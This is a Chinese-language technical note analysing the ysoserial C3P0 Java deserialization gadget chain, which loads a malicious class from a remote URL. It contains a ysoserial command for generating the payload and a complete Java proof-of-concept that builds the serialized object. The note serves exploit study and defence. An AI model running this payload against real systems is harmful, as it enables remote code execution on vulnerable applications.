ysoserial-C3P0 分析
- 2020 年 4 月 2 日
- 筆記
環境準備:
pom:
<!-- https://mvnrepository.com/artifact/com.mchange/c3p0 --> <dependency> <groupId>com.mchange</groupId> <artifactId>c3p0</artifactId> <version>0.9.5.2</version> </dependency>
payload生成:
java -jar ysoserial.jar C3P0 "http://127.0.0.1:8989/:Exploit" > test.ser //加載Exploit.class
調用鏈分析:
exec處下斷點,整個調用鏈如下圖所示:
反序列化的入口點時com/mchange/v2/c3p0/impl/PoolBackedDataSourceBase,
首先從輸入流中還原出一個referenceIndirector的內部類referenceSerialized的對象,然後判斷其若是不是類IndirectlySerialized的實例,由下圖可得此時referenceSerialized實現了referenceSerialized接口,那麼
referenceSerialized必定是其實例
而該接口定義了一個getObject方法,用於返回對象,所以就到了referenceSerialized類的getObject
在這裡獲取上下文,應該是嘗試通過jndi的方式獲取上下文,然而這裡contextname為null,即jndi失效,所以通過ReferenceableUtils.referenceToObject來加載引用,這裡引入的類名為exploit,也就是我們的惡意的位元組碼的文件名
reFerenceToObject根據Reference對象來獲取工廠類的名字,以及工廠類的地址,接着拿到類加載器,拿到appClassLoader(一般程序中類加載都用這個,它的上面還有jre核心類運行的加載(rt.jar)bootstrap classloader和擴展類加載ext classloader)
接着就判斷工廠類地址是否為空,不為空則去遠程地址加載工廠類,這裡用到了urlclassLoader,然後通過class.forname生成一個class 類型的實例,就加載到了工廠類,即我們的惡意位元組碼類
Class var12 = Class.forName(var4, true, (ClassLoader)var7);
接着newInstance完成了類的實例化,即觸發構造方法中的代碼塊執行
tip:
那麼這裡重點還是引用類的構造,即referenceSerialized的this.reference成員變量的賦值
ysoserial的構造:
這裡先實例化一個PoolBackedDataSource的實例,然後再將本地構造的PoolSource賦值給該類的connectionPoolDataSource成員方法,感覺這裡比較主要的就是重寫getReference方法來返回一個指向遠程地址的引用實例
看下PoolBackedDataSource的writeObject方法應該更好理解一點:
因為序列化時實際上是從輸入流中讀出一個object來調用其getobject,所以這裡第一次寫入的object就是要反序列化利用的object,第一個tobyteArray那裡如下圖catch到錯誤,因為poolsource是不可序列化的類,所以走到reference那裡indirector.indirectForm(this.connectionPoolDataSource),這個傳入的就是本地構造的poolsource的實例
indirectForm裏面調用poolSource的getRerence方法實際上想返回一個reference類型的實例,所以ysoserial構造gadget的時候要本地定義一個getRerence()方法
所以indirectForm最後返回一個ReferenceIndirector.ReferenceSerialized的實例,其可序列化,因為有下面兩個圖的關係
所以最終這裡調用weiteObject寫入序列化的數據流,完成payload的構造
所以就可以手動構造poc了:
poc.java
package C3P0; import com.mchange.v2.c3p0.PoolBackedDataSource; import com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase; import javax.naming.NamingException; import javax.naming.Reference; import javax.naming.Referenceable; import javax.sql.ConnectionPoolDataSource; import javax.sql.PooledConnection; import java.io.*; import java.lang.reflect.Constructor; import java.lang.reflect.Field; import java.lang.reflect.InvocationTargetException; import java.sql.SQLException; import java.sql.SQLFeatureNotSupportedException; import java.util.logging.Logger; public class payload1 { private static final class PoolSource implements ConnectionPoolDataSource, Referenceable { private String className; private String url; public PoolSource(String className, String url) { this.className = className; this.url = url; } @Override public Reference getReference() throws NamingException { return new Reference("exploit", this.className, this.url); } @Override public PooledConnection getPooledConnection() throws SQLException { return null; } @Override public PooledConnection getPooledConnection(String user, String password) throws SQLException { return null; } @Override public PrintWriter getLogWriter() throws SQLException { return null; } @Override public void setLogWriter(PrintWriter out) throws SQLException { } @Override public void setLoginTimeout(int seconds) throws SQLException { } @Override public int getLoginTimeout() throws SQLException { return 0; } @Override public Logger getParentLogger() throws SQLFeatureNotSupportedException { return null; } } public static void main(String[] args) throws NoSuchMethodException, IllegalAccessException, InvocationTargetException, InstantiationException, NoSuchFieldException, IOException { Constructor con = PoolBackedDataSource.class.getDeclaredConstructor(new Class[0]); con.setAccessible(true); PoolBackedDataSource obj = (PoolBackedDataSource) con.newInstance(new Object[0]); Field conData = PoolBackedDataSourceBase.class.getDeclaredField("connectionPoolDataSource"); conData.setAccessible(true); conData.set(obj, new PoolSource("Exploit", "http://127.0.0.1:8989/")); ObjectOutputStream objOut = new ObjectOutputStream(new FileOutputStream(System.getProperty("user.dir")+"/javasec-ysoserial/src/main/resources/t.ser")); objOut.writeObject(obj); } }
源碼地址:https://github.com/Wfzsec/ysoserial-poc